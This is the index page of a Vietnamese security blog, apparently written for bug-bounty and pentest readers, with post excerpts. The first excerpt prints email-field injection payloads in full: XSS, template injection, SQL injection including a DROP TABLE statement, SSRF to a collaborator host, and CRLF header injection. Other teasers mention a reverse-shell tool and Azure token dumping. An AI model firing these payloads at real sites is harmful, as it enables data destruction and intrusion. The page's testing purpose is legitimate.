Home

nhattruongblog

[Bug Bounty]Một số payload khi test trường email

Chép lại cho các ông copy nhé, nhất các ông :v XSS test+(alert(0))@example.comtest@example(alert(0)).com“alert(0)”@example.com Template injection “<%=7*7%>”@example.comtest+(${{7*7}})@example.com SQLi “‘OR1=1–‘”@example.com“mail’);DROP TABLE users;–“@example.com SSRF john.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1] Parameter pollution victim&email=attacker@example.com (Email) Header injection “%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com“recicpient@test.com>\r\nRCPT TO:<victim+”@test.com

Đọc tiếp

Reverseshell-Powercat-v2

Con hàng backconnect cơ bản, dùng khá okela, khá mượt. Link download: Muốn biến powershell thành exe thì dùng: Lưu ý: máy chủ C&C phải mở hai port.

Đọc tiếp

Outlook Form/Rule attack cheat sheet

Bài viết ngắn gọn cho tấn công Outlook form/rule attack, cách sử dụng công cụ ruler. Nguyên lý của tấn công này là tất cả các rule, custom form đều sẽ được đồng bộ nên có thể đăng nhập ở bất kỳ máy nào để thiết lập script độc hại. Đọc thêm: Công cụ Link…

Đọc tiếp

HTTP Request Smuggling toàn tập

I. HTTP request smuggling là gì? HTTP Request Smuggling là một kỹ thuật khai thác sự bất đồng bộ xử lý gói tin HTTP giữa máy chủ proxy/balancer/… với máy chủ web/backend. Lỗ hổng này thường gây ra các ảnh hưởng rất nghiệp trọng tới logic web thông thường. OK chúng ta sẽ cùng tìm…

Đọc tiếp

CÁC TIÊU CHÍ BẢO VỆ ỨNG DỤNG MOBILE

Bảo vệ ứng dụng mobile là một công việc không hề dễ, một ứng dụng mobile hiện đại (đặc biệt là tài chính, ngân hàng) sẽ phải đối mặt và gặp nhiều thách thức bởi sự tấn công của các tin tặc. nhattruong.blog xin đưa ra một số tiêu chí để bảo vệ cho ứng…

Đọc tiếp

ALIEN Language(Assembly x86) Part 1

Suốt quá trình phát triển của khoa học máy tính thì con người chúng ta luôn tìm cách để “bắt” máy tính hiểu những yêu cầu của mình. Nhưng bạn biết không thực ra máy tính chỉ có thể hiểu một ngôn ngữ duy nhất là machine code(mã máy). Trong khi chúng ta diễn giải…

Đọc tiếp

Azure Redteam Cheatsheet

I. Reconnaissance (external) Update useful tool: https://github.com/nyxgeek/o365recon Find the subdomain of the target Using microBurst enum email: II. Reconnaissance (internal) Using RoadTool Using StormSpotter Using Bloodhound, Azurehound III. Initial attack Brute force Illicit Consent Grant attack. Using IV. Lateral movement Check env command, look at IDENTITY_HEADER and IDENTITY_ENDPOINT, dump token by this code: Check Deployments…

Đọc tiếp

Loading…

Something went wrong. Please refresh the page and/or try again.


Thông Tin từ Exchange Team:



android security An toàn thông tin kỷ niệm 70 năm thành lập ngành Ngân hàng Việt Nam app security backconnect buffer overflow CTF CVE CVE-2019-18935 CVE-2021-26084 Cơ Sở An Toàn Thông Tin deserialization docker dynamic loader frida frida-server frida gadget FridaGadget.config FridaGadget.dylib frida server frida trace gumjs Hide and seek hà nội LD_PRELOAD LearnPress MB MBBANK pentest phố đi bộ pwn python python 2 python 3 RCE rsa SQL injection Teachers Record Management System 1.0 telerik UI truongtn VSEC vulnerability WaTF-Bank wordpress write up XXS

About

nhattruongblog